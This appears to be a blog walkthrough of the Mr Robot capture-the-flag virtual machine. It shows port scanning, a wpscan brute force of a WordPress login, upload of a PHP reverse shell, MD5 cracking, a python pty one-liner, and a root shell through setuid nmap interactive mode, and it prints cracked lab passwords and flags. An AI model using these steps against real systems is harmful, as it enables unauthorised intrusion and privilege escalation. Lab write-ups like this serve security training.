Today’s target was inspired by the Mr Robot series. The goal is to find 3 hidden flags.
I used Masscan to grab the open ports, which I then passed to Nmap:
1234567891011121314151617181920
masscan -p1-65535 --banners 192.168.217.145 --rate=10000
Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2017-07-01 08:49:44 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 443/tcp on 192.168.217.145
Discovered open port 80/tcp on 192.168.217.145
nmap -T4 -p80,443 -A 192.168.217.145
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03
Just a web server. However, this doesn’t look like your regular web app:
Interesting, we are in contact with fsociety! I ran each command (type help to see them listed at any time), and here’s what we have so far:
prepare – a video that ends with an address that warrants checking: whoismrrobot.com
fsociety – a CLI animation that asks if you are ready to join
inform – a series of news that reveal the hypocrisy of today’s (is it really made up?) society
question – more pictures with hard to accept truths
wakeup – shows some high level executives arguing in a skyscraper
join – fsociety requests your mail address to keep in touch
Alright, we had some fun. Now I checked that URL I mentioned earlier for more breadcrumbs:
You can click on the GUI, look around, play some games. There are also some commands you can run in the terminal:
fsociety_endgame – launches a game that you might want to discover for yourself
massacre – launches a movie, but I got a message that content is not available to my location
elliot – shows a GIF
fivenine – looks like a collection of clips related to the Five-Nine attack
restart – another scene from the series
join – get in touch with Mr Robot
archive – shows some of the above commands
Flag #1
When running the commands, you probably noticed that the web path changes to URL/cmdname. I looked for robots.txt, and it looks like Mr Robot isn’t the only robot around:
123
User-agent: *
fsocity.dic
key-1-of-3.txt
We’ve found the first flag: 073403c8a58a1f80d943455fb30724b9
The other things looks like a dictionary file with various strings. Maybe it will come in handy later.
Continuing the web recon, I decided to use a tool that I haven’t used before: uniscan!
I ran the CLI tool against the target with most of the flags. While described as simple, it checks for plenty of things: Drupal plugins, mobile versions, error message information, interesting HTML strings, performs whois and nslookup lookups, attempts banner grabbing, runs ping, traceroute and Nmap against the target, looks for some specific issues, and more:
wpscan --help
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 2.9.2
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________
Help :
Some values are settable in a config file, see the example.conf.json
--update Update the database to the latest version.
--url | -u <target url> The WordPress URL/domain to scan.
--force | -f Forces WPScan to not check if the remote site is running WordPress.
--enumerate | -e [option(s)] Enumeration.
option :
u usernames from id 1 to 10
u[10-20] usernames from id 10 to 20 (you must write [] chars)
p plugins
vp only vulnerable plugins
ap all plugins (can take a long time)
tt timthumbs
t themes
vt only vulnerable themes
at all themes (can take a long time)
Multiple values are allowed : "-e tt,p" will enumerate timthumbs and plugins
If no option is supplied, the default is "vt,tt,u,vp"
--exclude-content-based "<regexp or string>"
Used with the enumeration option, will exclude all occurrences based on the regexp or string supplied.
You do not need to provide the regexp delimiters, but you must write the quotes (simple or double).
--config-file | -c <config file> Use the specified config file, see the example.conf.json.
--user-agent | -a <User-Agent> Use the specified User-Agent.
--cookie <string> String to read cookies from.
--random-agent | -r Use a random User-Agent.
--follow-redirection If the target url has a redirection, it will be followed without asking if you wanted to do so or not
--batch Never ask for user input, use the default behaviour.
--no-color Do not use colors in the output.
--log Creates a log.txt file with WPScan's output.
--no-banner Prevents the WPScan banner from being displayed.
--disable-accept-header Prevents WPScan sending the Accept HTTP header.
--disable-referer Prevents setting the Referer header.
--disable-tls-checks Disables SSL/TLS certificate verification.
--wp-content-dir <wp content dir> WPScan try to find the content directory (ie wp-content) by scanning the index page, however you can specify it.
Subdirectories are allowed.
--wp-plugins-dir <wp plugins dir> Same thing than --wp-content-dir but for the plugins directory.
If not supplied, WPScan will use wp-content-dir/plugins. Subdirectories are allowed
--proxy <[protocol://]host:port> Supply a proxy. HTTP, SOCKS4 SOCKS4A and SOCKS5 are supported.
If no protocol is given (format host:port), HTTP will be used.
--proxy-auth <username:password> Supply the proxy login credentials.
--basic-auth <username:password> Set the HTTP Basic authentication.
--wordlist | -w <wordlist> Supply a wordlist for the password brute forcer.
--username | -U <username> Only brute force the supplied username.
--usernames <path-to-file> Only brute force the usernames from the file.
--cache-dir <cache-directory> Set the cache directory.
--cache-ttl <cache-ttl> Typhoeus cache TTL.
--request-timeout <request-timeout> Request Timeout.
--connect-timeout <connect-timeout> Connect Timeout.
--threads | -t <number of threads> The number of threads to use when multi-threading requests.
--max-threads <max-threads> Maximum Threads.
--throttle <milliseconds> Milliseconds to wait before doing another web request. If used, the --threads should be set to 1.
--help | -h This help screen.
--verbose | -v Verbose output.
--version Output the current version and exit.
Examples :
-Further help ...
ruby ./wpscan.rb --help
-Do 'non-intrusive' checks ...
ruby ./wpscan.rb --url www.example.com
-Do wordlist password brute force on enumerated users using 50 threads ...
ruby ./wpscan.rb --url www.example.com --wordlist darkc0de.lst --threads 50
-Do wordlist password brute force on the 'admin' username only ...
ruby ./wpscan.rb --url www.example.com --wordlist darkc0de.lst --username admin
-Enumerate installed plugins ...
ruby ./wpscan.rb --url www.example.com --enumerate p
-Enumerate installed themes ...
ruby ./wpscan.rb --url www.example.com --enumerate t
-Enumerate users ...
ruby ./wpscan.rb --url www.example.com --enumerate u
-Enumerate installed timthumbs ...
ruby ./wpscan.rb --url www.example.com --enumerate tt
-Use a HTTP proxy ...
ruby ./wpscan.rb --url www.example.com --proxy 127.0.0.1:8118
-Use a SOCKS5 proxy ... (cURL >= v7.21.7 needed)
ruby ./wpscan.rb --url www.example.com --proxy socks5://127.0.0.1:9000
-Use custom content directory ...
ruby ./wpscan.rb -u www.example.com --wp-content-dir custom-content
-Use custom plugins directory ...
ruby ./wpscan.rb -u www.example.com --wp-plugins-dir wp-content/custom-plugins
-Update the DB ...
ruby ./wpscan.rb --update
-Debug output ...
ruby ./wpscan.rb --url www.example.com --debug-output 2>debug.log
See README for further information.
First, I updated the wpscan databse with wpscan —update. Then I performed some enumeration on the target:
wpscan --url http://192.168.217.145 --enumerate u vp vt --no-banner
[+] URL: http://192.168.217.145/
[+] Started: Sat Jul 1 07:40:05 2017
[+] robots.txt available under: 'http://192.168.217.145/robots.txt'
[!] The WordPress 'http://192.168.217.145/readme.html' file exists exposing a version number
[+] Interesting header: SERVER: Apache
[+] Interesting header: X-FRAME-OPTIONS: SAMEORIGIN
[+] Interesting header: X-MOD-PAGESPEED: 1.9.32.3-4523
[+] XML-RPC Interface available under: http://192.168.217.145/xmlrpc.php
[+] WordPress version 4.3.11 (Released on 2017-05-16) identified from rss generator, rdf generator, atom generator, links opml
[!] 1 vulnerability identified from the version number
[!] Title: WordPress 2.3-4.7.5 - Host Header Injection in Password Reset
Reference: https://wpvulndb.com/vulnerabilities/8807
Reference: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
Reference: http://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295
[+] Enumerating plugins from passive detection ...
[+] No plugins found
[+] Enumerating usernames ...
[+] We did not enumerate any usernames
[+] Finished: Sat Jul 1 07:40:07 2017
[+] Requests Done: 57
[+] Memory used: 17.109 MB
[+] Elapsed time: 00:00:02
I couldn’t use wpscan’s findings for exploitation. Based on our earlier finding of a dictionary file, the next step seems to involve bruteforcing. I went back to the file and looked at its size:
12
wc -l fsocity.dic
858160 fsocity.dic
Not a small one, but maybe it contains duplicates:
12
sort fsocity.dic | uniq | wc -l
11451
A little over 11k, much more promising! I created a new file without the duplicates: sort fsocity.dic | uniq > fsociety.txt.
The next step was to visit http://192.168.217.145/wp-login.php and try to gather more information. Bogus login attempts triggered the message: ERROR: Invalid username. Next, I looked in the source to see how form parameters look like:
It seemed I would have to bruteforce for both username and password, but I tried a few character names from the series first, and that’s how I found that elliot is a valid user. With this, I used wpscan to perform the bruteforce attack for the password:
Excellent, wpscan found the password is ER28-0652! I logged in and noticed that all the plugins are outdated:
I tried uploading a PHP reverse shell as plugin, but got an error that it couldn’t install it. I looked in other places where I could upload it, and when browsing the Media tab, I noticed my shell was there :O
I cracked the MD5 hash to reveal the password abcdefghijklmnopqrstuvwxyz for the user robot. I tried switching to that user, but I got the following error:
12
$ su robot
su: must be run from a terminal
The error appears because the shell isn’t interactive. But I ran into this before, and again pentestmonkey’s oneliners came to the rescue:
123456
$ python -c 'import pty; pty.spawn("/bin/sh")'
$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz
robot@linux:/$
I grabbed the second flag, and noticed that my commands are now echoed in the terminal and it’s annoying:
After Googling, there even seems to be a setuid Nmap exploit in Metasploit! I read more about this problem, and found an interesting SANS paper (the Nmap stuff begins on page 11). After some reading, I found that older versions of Nmap had an interactive mode, where you could run shell commands from or drop into a shell (similar to mysql):
123456
robot@linux:/$ nmap --interactive
nmap --interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap>
The Nmap version is 3.81, so I tried it out:
1234
nmap> !whoami
!whoami
root
waiting to reap child : No child processes
It did work! Game over, Mr Robot!
12345678
nmap> !sh
!sh
# ls /root
ls /root
firstboot_done key-3-of-3.txt
# cat /root/key-3-of-3.txt
cat /root/key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
Another interesting challenge, more story driven. It reminded me of Primer.
___________________________________
/ You have literary talent that you \
\ should take pains to develop. /
-----------------------------------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
